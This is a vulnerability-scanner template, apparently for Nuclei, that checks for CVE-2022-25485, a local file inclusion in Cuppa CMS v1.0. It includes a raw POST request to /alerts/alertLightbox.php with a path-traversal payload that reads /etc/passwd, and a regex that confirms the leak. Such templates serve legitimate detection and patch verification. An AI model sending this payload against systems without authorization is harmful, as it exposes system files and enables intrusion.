47 lines
1.4 KiB
YAML
47 lines
1.4 KiB
YAML
id: CVE-2022-25485
|
|
|
|
info:
|
|
name: Cuppa CMS v1.0 - Local File Inclusion
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php.
|
|
remediation: |
|
|
Upgrade to the latest version of Cuppa CMS or apply the vendor-provided patch to fix the LFI vulnerability.
|
|
reference:
|
|
- https://github.com/CuppaCMS/CuppaCMS
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25485
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.8
|
|
cve-id: CVE-2022-25485
|
|
cwe-id: CWE-829
|
|
epss-score: 0.00648
|
|
epss-percentile: 0.77028
|
|
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: cuppacms
|
|
product: cuppacms
|
|
tags: cve,cve2022,lfi,cuppa
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /alerts/alertLightbox.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
url=../../../../../../../../../../../etc/passwd
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a004730450220177f85b522845e1eb6e852b6c6512d5e99ed42f87160e03ce2f4d90afb3f682b022100aee745486e73a484284bb3c6829dc7831260bc389ea0932d23bcd9c03bf927b2:922c64590222798bb761d5b6d8e72950 |